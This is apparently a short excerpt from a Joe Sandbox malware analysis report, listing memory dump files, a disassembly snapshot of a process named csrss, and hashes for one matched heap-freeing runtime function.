                                                                                                                                                                                                      • Source File: 00000004.00000002.3484645530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.0000000000824000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.000000000083D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.3484645530.0000000000843000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_csrss.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                                                                      • Opcode ID: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                                                      • Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78909d6c4936e91804b8b1daa8b3149c3f077c8927f69aac5a87e0b9846f729e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%